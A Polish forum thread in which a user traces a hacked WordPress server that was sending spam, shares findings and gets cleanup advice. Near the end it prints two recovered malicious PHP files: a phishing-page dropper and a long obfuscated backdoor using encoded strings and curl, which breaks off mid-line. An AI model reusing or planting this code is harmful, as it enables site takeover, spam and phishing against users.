SPAM z mojego adresu

0

Witam, nie wiem czy to odpowiedni dział, ale zobaczyłem u siebie taką wadomość od OVH.

Szanowni Państwo,

Wykryliśmy wysyłkę wiadomości oznaczonych przez filtry jako SPAM dla adresu IP:
xx.xx.xx.xx (moj ip)

Ze względów bezpieczeństwa ruch wychodzący z serwera dla portów 25 został
zablokowany.

Przesyłamy również szczegóły na temat zablokowanej wysyłki wiadomości:

Destination IP: 74.6.137.64 - Message-ID: [email protected] - Spam score: 500
Destination IP: 74.6.137.64 - Message-ID: [email protected] - Spam score: 300
Destination IP: 74.6.137.64 - Message-ID: [email protected] - Spam score: 500
Destination IP: 74.6.137.64 - Message-ID: [email protected] - Spam score: 500
Destination IP: 74.6.137.64 - Message-ID: [email protected] - Spam score: 500

Jeśli sprawdzili Państwo przyczynę problemu i go Państwo usunęli, mogą Państwo zdjąć blokadę z IP w panelu klienta na tej stronie:

(link do ovh)

Z poważaniem,
Biuro Obsługi Klienta OVH

Hasła nie zmienione, nie wygląda na włamanie, zaraz zobaczę logi. Co ciekawe ja nawet nie miałem tam serwera pocztowego, jedynie poczte gmail podpieta do wysylania, ale to raczej nie to, mialbym mial z googla a nie od ovh. Jestem lekko przerażony.

0

O nie!!!!!!!!!!
Tak, jednak padłem ofiarą włamania. Moja strona, na której nic nie było, tzn. czysty wordpress teraz jest blokoawny przez ublocka, że niby są jakieś reklamy czy coś.

0

screenshot-20190629224151.png
nawet nie mogę się zalogować do wordpressa, aż się boje

0

screenshot-20190629225002.png
to nie moje, dla przykładu plik dominicasm przenosi na strone http://myhealthdeal.su/

przykładowe logi (jest tego tysiące linii)
screenshot-20190629225429.png

Chyba już się mogę pożegnać z IP i domeną.

1

Czy zostały usunięte jakieś pliki dane, których nie masz w kopii zapasowej?

0

jeżeli nie masz tam danych na których ci zależy to nie ma co bawić się w ciuciu babkę, lepiej wywal wszystko rm -R pozmieniaj hasła i na nowo postaw wordpressa, albo wrzuć kopię jeżeli masz

0

@Silv: w sumie to nie, nie miałem tam nawet nic ciekawego, ot podpięta domena do serwera i czysty wordpress i stary projekt w php symfony.

@au7h: Lubie takie hakerskie zabawy :)
Czy ktoś wie co to znaczy stealth?
screenshot-20190629225803.png

1

Może także być przydatny ten link (nie czytałem, bo sam nie używam Wordpressa) – https://wordpress.org/support/article/faq-my-site-was-hacked/

3
CodeRZ napisał(a):

Czy ktoś wie co to znaczy stealth?

Ja wiem – stealth znaczy podstęp.

0

Usunąłem proces [stealth] który zabierał najwięcej CPU, userem był www-data. Od razu lepiej chodzi.
screenshot-20190629232533.png

Potem wszystkie javy, mysql-e, no i kilka(naście) apachy.
Teraz lepiej:
screenshot-20190629233317.png

Tylko jeden plik cron?
screenshot-20190629234211.png
Zobaczmy:
screenshot-20190629234146.png
Jestem rozczarowany...

A cóż to za pliczek? Haker jeszcze godzine temu zmieniał hasło. Może nawet razem ze mną siedzi
screenshot-20190629235103.png

Nawet maila nie uszanowali. Nie włamali się, ale spamu dużo już jest.
screenshot-20190629234642.png

A to ciekawe:
screenshot-20190629235348.png

0

Jestem już w wordpressie, bardzo dziwna sprawa, założył konto, ale pisał na moim
screenshot-20190630000148.png

0

Chyba wszystko staje się powoli jasne, w katalogu wordpressa jest masa nowych nowych plików (widać po dacie i nazwach folderów).
screenshot-20190630001622.png

Przykładowy folder zawiera php z czymś takim:
screenshot-20190630001702.png
bardzo możliwe, że haker mógł w ten sposób sterować wszystkim. Jeszcze będę badał zawartość tych plików, jednak chyba wszędzie w tych folderach jest to samo:

albo jakieś bardzo bardzo dziwne pliki:
screenshot-20190630002048.png

0

Na dzisiaj wystarczy, jest już późna godizna, serwer off i nie poddam się bez walki.
Z moich wstępnych analiz wynika, że nie dostał się do terminala.

screenshot-20190630002430.png

0

screenshot-20190630004146.png

sendmail zainstalowany ale nieskonfigurowany, maile nie wychodzą tylko trafiają do
screenshot-20190630004306.png
to akurat dwa moje o zmiane hasła, zebym mogl sie dostac do wordpressa

0

Czy sendmail to nie jest coś pokroju wtyczki do WordPressa?

0

Ciekawe, wszystko do uzytkownika https://4programmers.net/uploads/attachment/5d/5d17ea368b174.pngloads/attachment/5d/5d17ea368b174.png)

1

Wystarczyło zrobić logowanie do wp po ip, zmienić url, zrobić max 3 próby na ip i autoryzacje zmian w plikach na hasło ;)

1

Serwer jest do zaorania natychmiast. Można sobie logi zachować do analizy.

Wordpressa należy postawić osobno, na nowej instancji, i do odtworzenia danych użyć dumpa bazy i tylko tego, ale na localhoście. Dump oczywiście na domyślnej instalacji wordpress, nie wstawiać żadnych wtyczek. Potem ręczna weryfikacja danych w bazie przez panel, a potem weryfikacja plików w wp-upload, bo każdy nawet jpeg może nim nie być rzeczywiście. Generalnie, jak nie było kopii codziennej, to bym nie odtwarzał plików z wp-upload w ogóle. Tyle na szybko. Jak ktoś tego nie ogarnia, niech nie stawia wordpressa samodzielnie tylko skorzysta z tego *.wordpress.com

0

Wystarczy zainstalować All-in-One WP Migration zrobić kopię strony jednym klikiem, ściągnąć na swój dysk i potem, w razie problemów jednym klikiem przywracasz, chyba nie może być prościej :)

0
  1. Trzymanie wordpressa bez aktualizacji to jak proszenie się o włam ;)
  2. Te dziwne pliki php to pewnie sprytnie enkodowany php-shell. Takie uroki php, ze jeśli masz możliwość zapisania pliku na serwerze poprzez jakąś lukę to automatycznie dostajesz remote-code-execution.
0

@czysteskarpety: niestety mam zmienne ip więc to odpada, url zmienić mogłem owszem,
@TurkucPodjadek: i tak nic tam szczególnego nie miałem, ponowna instalacja z panelu ovh i od nowa.
@czysteskarpety: mam ten plugin, używam od zawsze, kopia zawsze jest u mnie lokalnie na dysku :)
@Shalom: 1. nie taki stary ten wp
screenshot-20190701090657.png
2. Na 100% tak, tutaj jakiś shell z googla, też ma użytkownika (https://4programmers.net/uploads/attachment/5d/5d19b1811b2ca.png niego dostać, tylko trzeba wpisać jakiś login i hasło.
screenshot-20190701090849.png
Inne strony nie ruszone, ale i tak będę musiał zrobić formata.

Jest mnóstwo katalogów, plików
screenshot-20190701091124.png

ale każdy zawiera to:
screenshot-20190701091156.png

potem wrzuce kod wszystkiego

edit:

skrypt tworzacy pliki z logowaniem (screen powyżej)

<?php
session_start();
?>
<?php
$login = $_GET['email'];
$dir =  getcwd();
if ($handle = opendir($dir)) {
    while (false !== ($entry = readdir($handle))) {
 $len = strlen($entry);
if($len == 28){
rename($entry, "https://domena.pl/crs09119/");
}}}
$staticfile = "https://domena.pl/crs09119/";
$name =  generateRandomString();
$secfile = $name.".php";
if (!copy($staticfile, $secfile)) {
//echo "file not create\n";
}else {
if(file_exists($secfile)){
//echo "file exist\n";
unlink($staticfile);
header("Location: https://domena.pl/crs09119/?&email=$login&rand=4#n=1252899642&fid=1&fav=1");
}}

//echo $_SESSION["file"]."\n";
$name =  generateRandomString();
function generateRandomString($length = 24) {
    $characters = '0vwxyz';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}
?>

bestside.php.suspected

<?php
//header('Content-Type:text/html; charset=utf-8');
$O00O0_O__O='1';
$O__00OO0O_=base64_decode("LTQ2bnFhX2U4OWR5cmJpa2hqZnB3eGN0em1sMnNvdjdndTAzNTE=");$OO0OO00___=$O__00OO0O_{19}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{32}.$O__00OO0O_{6}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{19}.$O__00OO0O_{26}.$O__00OO0O_{5}.$O__00OO0O_{22}.$O__00OO0O_{7}.$O__00OO0O_{6}.$O__00OO0O_{22}.$O__00OO0O_{5}.$O__00OO0O_{26}.$O__00OO0O_{26}.$O__00OO0O_{13}.$O__00OO0O_{5}.$O__00OO0O_{22}.$O__00OO0O_{15};$O0_0__0OOO=$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{5}.$O__00OO0O_{25}.$O__00OO0O_{6}.$O__00OO0O_{28}.$O__00OO0O_{29}.$O__00OO0O_{22}.$O__00OO0O_{15}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{22}.$O__00OO0O_{26}.$O__00OO0O_{14}.$O__00OO0O_{7}.$O__00OO0O_{3}.$O__00OO0O_{23};$OO_0__OO00=$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{5}.$O__00OO0O_{25}.$O__00OO0O_{6}.$O__00OO0O_{32}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{25}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{5}.$O__00OO0O_{6}.$O__00OO0O_{10}.$O__00OO0O_{5}.$O__00OO0O_{23}.$O__00OO0O_{5};$O__O00O0O_=$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{5}.$O__00OO0O_{25}.$O__00OO0O_{6}.$O__00OO0O_{28}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{13}.$O__00OO0O_{26}.$O__00OO0O_{29}.$O__00OO0O_{22}.$O__00OO0O_{15}.$O__00OO0O_{14}.$O__00OO0O_{3}.$O__00OO0O_{32};$O00O0_OO__=$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{5}.$O__00OO0O_{25}.$O__00OO0O_{6}.$O__00OO0O_{28}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{23}.$O__00OO0O_{14}.$O__00OO0O_{25}.$O__00OO0O_{7}.$O__00OO0O_{29}.$O__00OO0O_{33}.$O__00OO0O_{23};$O0O_OO0__0=$O__00OO0O_{18}.$O__00OO0O_{14}.$O__00OO0O_{26}.$O__00OO0O_{7}.$O__00OO0O_{6}.$O__00OO0O_{19}.$O__00OO0O_{33}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{22}.$O__00OO0O_{29}.$O__00OO0O_{3}.$O__00OO0O_{23}.$O__00OO0O_{7}.$O__00OO0O_{3}.$O__00OO0O_{23}.$O__00OO0O_{28};$O0OO_0__O0=$O__00OO0O_{18}.$O__00OO0O_{14}.$O__00OO0O_{26}.$O__00OO0O_{7}.$O__00OO0O_{6}.$O__00OO0O_{32}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{22}.$O__00OO0O_{29}.$O__00OO0O_{3}.$O__00OO0O_{23}.$O__00OO0O_{7}.$O__00OO0O_{3}.$O__00OO0O_{23}.$O__00OO0O_{28};$O_O__000OO=$O__00OO0O_{16}.$O__00OO0O_{23}.$O__00OO0O_{23}.$O__00OO0O_{19}.$O__00OO0O_{6}.$O__00OO0O_{13}.$O__00OO0O_{33}.$O__00OO0O_{14}.$O__00OO0O_{26}.$O__00OO0O_{10}.$O__00OO0O_{6}.$O__00OO0O_{4}.$O__00OO0O_{33}.$O__00OO0O_{7}.$O__00OO0O_{12}.$O__00OO0O_{11};$OO_00OO0__=$O__00OO0O_{18}.$O__00OO0O_{33}.$O__00OO0O_{3}.$O__00OO0O_{22}.$O__00OO0O_{23}.$O__00OO0O_{14}.$O__00OO0O_{29}.$O__00OO0O_{3}.$O__00OO0O_{6}.$O__00OO0O_{7}.$O__00OO0O_{21}.$O__00OO0O_{14}.$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{28};$OO0O0O_0__=$O__00OO0O_{22}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{5}.$O__00OO0O_{23}.$O__00OO0O_{7}.$O__00OO0O_{6}.$O__00OO0O_{18}.$O__00OO0O_{33}.$O__00OO0O_{3}.$O__00OO0O_{22}.$O__00OO0O_{23}.$O__00OO0O_{14}.$O__00OO0O_{29}.$O__00OO0O_{3};$O_0O0O__0O=$O__00OO0O_{28}.$O__00OO0O_{29}.$O__00OO0O_{22}.$O__00OO0O_{15}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{22}.$O__00OO0O_{29}.$O__00OO0O_{3}.$O__00OO0O_{3}.$O__00OO0O_{7}.$O__00OO0O_{22}.$O__00OO0O_{23};$OO0O__O_00=$O__00OO0O_{32}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{16}.$O__00OO0O_{29}.$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{13}.$O__00OO0O_{11}.$O__00OO0O_{3}.$O__00OO0O_{5}.$O__00OO0O_{25}.$O__00OO0O_{7};$O_0O__O0O0=$O__00OO0O_{13}.$O__00OO0O_{5}.$O__00OO0O_{28}.$O__00OO0O_{7}.$O__00OO0O_{2}.$O__00OO0O_{1}.$O__00OO0O_{6}.$O__00OO0O_{10}.$O__00OO0O_{7}.$O__00OO0O_{22}.$O__00OO0O_{29}.$O__00OO0O_{10}.$O__00OO0O_{7};$O__0O0O_0O=$O__00OO0O_{28}.$O__00OO0O_{29}.$O__00OO0O_{22}.$O__00OO0O_{15}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{20}.$O__00OO0O_{12}.$O__00OO0O_{14}.$O__00OO0O_{23}.$O__00OO0O_{7};$O000_O_O_O=$O__00OO0O_{28}.$O__00OO0O_{29}.$O__00OO0O_{22}.$O__00OO0O_{15}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{22}.$O__00OO0O_{26}.$O__00OO0O_{29}.$O__00OO0O_{28}.$O__00OO0O_{7};$O0O0_O_0O_=$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{12}.$O__00OO0O_{6}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{19}.$O__00OO0O_{26}.$O__00OO0O_{5}.$O__00OO0O_{22}.$O__00OO0O_{7};$OO_00_0O_O=$O__00OO0O_{28}.$O__00OO0O_{29}.$O__00OO0O_{22}.$O__00OO0O_{15}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{5}.$O__00OO0O_{10};$O0_OO_0_O0=$O__00OO0O_{18}.$O__00OO0O_{14}.$O__00OO0O_{26}.$O__00OO0O_{7}.$O__00OO0O_{6}.$O__00OO0O_{7}.$O__00OO0O_{21}.$O__00OO0O_{14}.$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{28};$O__0OO0_O0=$O__00OO0O_{22}.$O__00OO0O_{33}.$O__00OO0O_{12}.$O__00OO0O_{26}.$O__00OO0O_{6}.$O__00OO0O_{28}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{29}.$O__00OO0O_{19}.$O__00OO0O_{23};$OOO00_O0__=$O__00OO0O_{5}.$O__00OO0O_{12}.$O__00OO0O_{12}.$O__00OO0O_{5}.$O__00OO0O_{11}.$O__00OO0O_{6}.$O__00OO0O_{28}.$O__00OO0O_{16}.$O__00OO0O_{14}.$O__00OO0O_{18}.$O__00OO0O_{23};$O00__OO0O_=$O__00OO0O_{19}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{32}.$O__00OO0O_{6}.$O__00OO0O_{25}.$O__00OO0O_{5}.$O__00OO0O_{23}.$O__00OO0O_{22}.$O__00OO0O_{16};$OOO0O_0__0=$O__00OO0O_{22}.$O__00OO0O_{33}.$O__00OO0O_{12}.$O__00OO0O_{26}.$O__00OO0O_{6}.$O__00OO0O_{7}.$O__00OO0O_{12}.$O__00OO0O_{12}.$O__00OO0O_{29}.$O__00OO0O_{12};$O_OO0__00O=$O__00OO0O_{22}.$O__00OO0O_{33}.$O__00OO0O_{12}.$O__00OO0O_{26}.$O__00OO0O_{6}.$O__00OO0O_{22}.$O__00OO0O_{26}.$O__00OO0O_{29}.$O__00OO0O_{28}.$O__00OO0O_{7};$OO__O0O00_=$O__00OO0O_{19}.$O__00OO0O_{5}.$O__00OO0O_{12}.$O__00OO0O_{28}.$O__00OO0O_{7}.$O__00OO0O_{6}.$O__00OO0O_{33}.$O__00OO0O_{12}.$O__00OO0O_{26};$O_0O_O_00O=$O__00OO0O_{32}.$O__00OO0O_{24}.$O__00OO0O_{14}.$O__00OO0O_{3}.$O__00OO0O_{18}.$O__00OO0O_{26}.$O__00OO0O_{5}.$O__00OO0O_{23}.$O__00OO0O_{7};$O00__0O_OO=$O__00OO0O_{18}.$O__00OO0O_{14}.$O__00OO0O_{26}.$O__00OO0O_{7}.$O__00OO0O_{25}.$O__00OO0O_{23}.$O__00OO0O_{14}.$O__00OO0O_{25}.$O__00OO0O_{7};$O_0__0OOO0=$O__00OO0O_{22}.$O__00OO0O_{33}.$O__00OO0O_{12}.$O__00OO0O_{26}.$O__00OO0O_{6}.$O__00OO0O_{14}.$O__00OO0O_{3}.$O__00OO0O_{14}.$O__00OO0O_{23};$O0OO__0_O0=$O__00OO0O_{22}.$O__00OO0O_{33}.$O__00OO0O_{12}.$O__00OO0O_{26}.$O__00OO0O_{6}.$O__00OO0O_{7}.$O__00OO0O_{21}.$O__00OO0O_{7}.$O__00OO0O_{22};$O_OOO__000=$O__00OO0O_{14}.$O__00OO0O_{28}.$O__00OO0O_{6}.$O__00OO0O_{5}.$O__00OO0O_{12}.$O__00OO0O_{12}.$O__00OO0O_{5}.$O__00OO0O_{11};$O0O00O__O_=$O__00OO0O_{25}.$O__00OO0O_{23}.$O__00OO0O_{6}.$O__00OO0O_{12}.$O__00OO0O_{5}.$O__00OO0O_{3}.$O__00OO0O_{10};$O_0O_O0_O0=$O__00OO0O_{14}.$O__00OO0O_{25}.$O__00OO0O_{19}.$O__00OO0O_{26}.$O__00OO0O_{29}.$O__00OO0O_{10}.$O__00OO0O_{7};$O_O_0_0O0O=$O__00OO0O_{7}.$O__00OO0O_{21}.$O__00OO0O_{19}.$O__00OO0O_{26}.$O__00OO0O_{29}.$O__00OO0O_{10}.$O__00OO0O_{7};$O_O0_0OO0_=$O__00OO0O_{33}.$O__00OO0O_{28}.$O__00OO0O_{26}.$O__00OO0O_{7}.$O__00OO0O_{7}.$O__00OO0O_{19};$OO_O_O0_00=$O__00OO0O_{33}.$O__00OO0O_{3}.$O__00OO0O_{26}.$O__00OO0O_{14}.$O__00OO0O_{3}.$O__00OO0O_{15};$O00OOO__0_=$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{12}.$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{12};$OOO0__00O_=$O__00OO0O_{28}.$O__00OO0O_{23}.$O__00OO0O_{12}.$O__00OO0O_{26}.$O__00OO0O_{7}.$O__00OO0O_{3};$OO0_0O_0O_=$O__00OO0O_{16}.$O__00OO0O_{7}.$O__00OO0O_{21}.$O__00OO0O_{10}.$O__00OO0O_{7}.$O__00OO0O_{22};$O0O_O__00O=$O__00OO0O_{18}.$O__00OO0O_{20}.$O__00OO0O_{12}.$O__00OO0O_{14}.$O__00OO0O_{23}.$O__00OO0O_{7};$O0O__0OO0_=$O__00OO0O_{18}.$O__00OO0O_{22}.$O__00OO0O_{26}.$O__00OO0O_{29}.$O__00OO0O_{28}.$O__00OO0O_{7};$O_O0_0_0OO=$O__00OO0O_{23}.$O__00OO0O_{29}.$O__00OO0O_{33}.$O__00OO0O_{22}.$O__00OO0O_{16};$OO_O00_0O_=$O__00OO0O_{18}.$O__00OO0O_{12}.$O__00OO0O_{7}.$O__00OO0O_{5}.$O__00OO0O_{10};$OO__0_OO00=$O__00OO0O_{18}.$O__00OO0O_{32}.$O__00OO0O_{7}.$O__00OO0O_{23}.$O__00OO0O_{28};$OO_OO00__0=$O__00OO0O_{22}.$O__00OO0O_{16}.$O__00OO0O_{25}.$O__00OO0O_{29}.$O__00OO0O_{10};$OO00__O_O0=$O__00OO0O_{23}.$O__00OO0O_{12}.$O__00OO0O_{14}.$O__00OO0O_{25};$OOO0O___00=$O__00OO0O_{17}.$O__00OO0O_{29}.$O__00OO0O_{14}.$O__00OO0O_{3};$O0O00O_O__=$O__00OO0O_{18}.$O__00OO0O_{7}.$O__00OO0O_{29}.$O__00OO0O_{18};header('Content-Type:text/html;charset=utf-8');if(!function_exists('str_ireplace')){function str_ireplace($from,$to,$string){return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));}};$O_OO__O000=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]('$url,$OO0__0O0_O=0,$OO00__0OO_=1,$O0_0_O0OO_=NULL,$O__O0O0_0O=array()','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x4f\x4f\x30\x4f\x5f"]("/^http\\:\\/\\//si",$url)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O00__O0_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'iy4tyhTkktKsovilXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$O00__O0_OO.=$url;echo $O00__O0_OO;unset($O00__O0_OO);exit();}return \'\';}$OO__0O_00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$O0OOO__0_0=$O_O0_OO00_=\'\';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x4f\x30\x4f"](\'|\',$OO__0O_00O) as $c){$O0OO0O__0_=1;if($OO0__0O0_O&&substr($c,0,1)==\'c\'){continue;}foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x4f\x30\x4f"](\'+\',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x4f\x4f\x30\x5f\x5f"]($d)){$O0OO0O__0_=0;}}unset($d);if($O0OO0O__0_){$O0OOO__0_0=$c;break;}}unset($OO__0O_00O,$c);if($O0OOO__0_0==\'\'){return 0;}if(substr($O0OOO__0_0,0,1)==\'c\'){$O_O0OO0_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x30\x4f\x4f\x4f\x30"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30"]($O_O0OO0_0_,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30"]($O_O0OO0_0_,CURLOPT_USERAGENT,\'WHR\');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30"]($O_O0OO0_0_,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30"]($O_O0OO0_0_,CURLOPT_TIMEOUT,100);if($OO00__0OO_==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30"]($O_O0OO0_0_,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x4f\x5f\x5f\x30\x30\x30"]($O0_0_O0OO_)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30"]($O_O0OO0_0_,CURLOPT_POSTFIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x5f\x30\x30\x30\x4f\x4f"]($O0_0_O0OO_));}}$OOO_0_0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x5f\x5f\x30\x5f\x4f\x30"]($O_O0OO0_0_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x5f\x30\x30\x4f"]($O_O0OO0_0_);if(!$OOO_0_0O0_){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O00__O0_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'i04uLhTcpRSC0qyi+KVctLKi6tPwBgA=\');$O00__O0_OO.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x4f\x5f\x30\x5f\x5f\x30"]($O_O0OO0_0_);echo $O00__O0_OO;unset($O00__O0_OO);exit();}return 0;}else{$OOO_0_0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30"]($OOO_0_0O0_,"\\xEF\\xBB\\xBF"));return $OOO_0_0O0_;}}$O__0O0_0OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x4f\x30\x30\x5f"]($url);isset($O__0O0_0OO["\x68\x6f\x73\x74"])||$O__0O0_0OO["\x68\x6f\x73\x74"]=\'\';isset($O__0O0_0OO["\x70\x61\x74\x68"])||$O__0O0_0OO["\x70\x61\x74\x68"]=\'\';isset($O__0O0_0OO["\x71\x75\x65\x72\x79"])|| $O__0O0_0OO["\x71\x75\x65\x72\x79"]=\'\';isset($O__0O0_0OO["\x4f\x5f\x30\x30\x4f\x5f\x5f\x4f\x4f\x30"])||$O__0O0_0OO["\x4f\x5f\x30\x30\x4f\x5f\x5f\x4f\x4f\x30"]=\'\';$O0_O_O_O00=$O__0O0_0OO["\x70\x61\x74\x68"]?$O__0O0_0OO["\x70\x61\x74\x68"].($O__0O0_0OO["\x71\x75\x65\x72\x79"]?\'?\'.$O__0O0_0OO["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$O0_0_0OO_O=$O__0O0_0OO["\x68\x6f\x73\x74"];if($O__0O0_0OO["\x73\x63\x68\x65\x6d\x65"]==\'https\'){$O0O0__O0O_=\'1.1\';$O_00O__OO0=empty($O__0O0_0OO["\x4f\x5f\x30\x30\x4f\x5f\x5f\x4f\x4f\x30"])?443:$O__0O0_0OO["\x4f\x5f\x30\x30\x4f\x5f\x5f\x4f\x4f\x30"];$O0_0_0OO_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'Ky7OshTdLtPXBwA=\');$O0_0_0OO_O.=$O__0O0_0OO["\x68\x6f\x73\x74"];}else{$O0O0__O0O_=\'1.0\';$O_00O__OO0=empty($O__0O0_0OO["\x4f\x5f\x30\x30\x4f\x5f\x5f\x4f\x4f\x30"])?80:$O__0O0_0OO["\x4f\x5f\x30\x30\x4f\x5f\x5f\x4f\x4f\x30"];}$O0O_O0_0O_=\'Host:\';$O0O_O0_0O_.=$O0_0_0OO_O;$O__O0O0_0O[]=$O0O_O0_0O_;$O__O0O0_0O[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$O__O0O0_0O[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'Cy1OLhTdJ1TE/NK7EK9wgtPCAA==\');$O__O0O0_0O[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'c0xOThTi0osdLtPS1wIA\');unset($O0O_O0_0O_);if($OO00__0OO_==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x4f\x5f\x5f\x30\x30\x30"]($O0_0_O0OO_)){$O0_0_O0OO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x5f\x30\x30\x30\x4f\x4f"]($O0_0_O0OO_);}$O__O0O0_0O[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'c87PKhT0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9tPJTQEA\');$O__O0O0_0O[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'c87PKhT0nNK9H1Sc1LL8mtPwAgA=\').${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x30\x30\x4f\x5f"]($O0_0_O0OO_);$O_O0_OO00_="POST $O0_O_O_O00 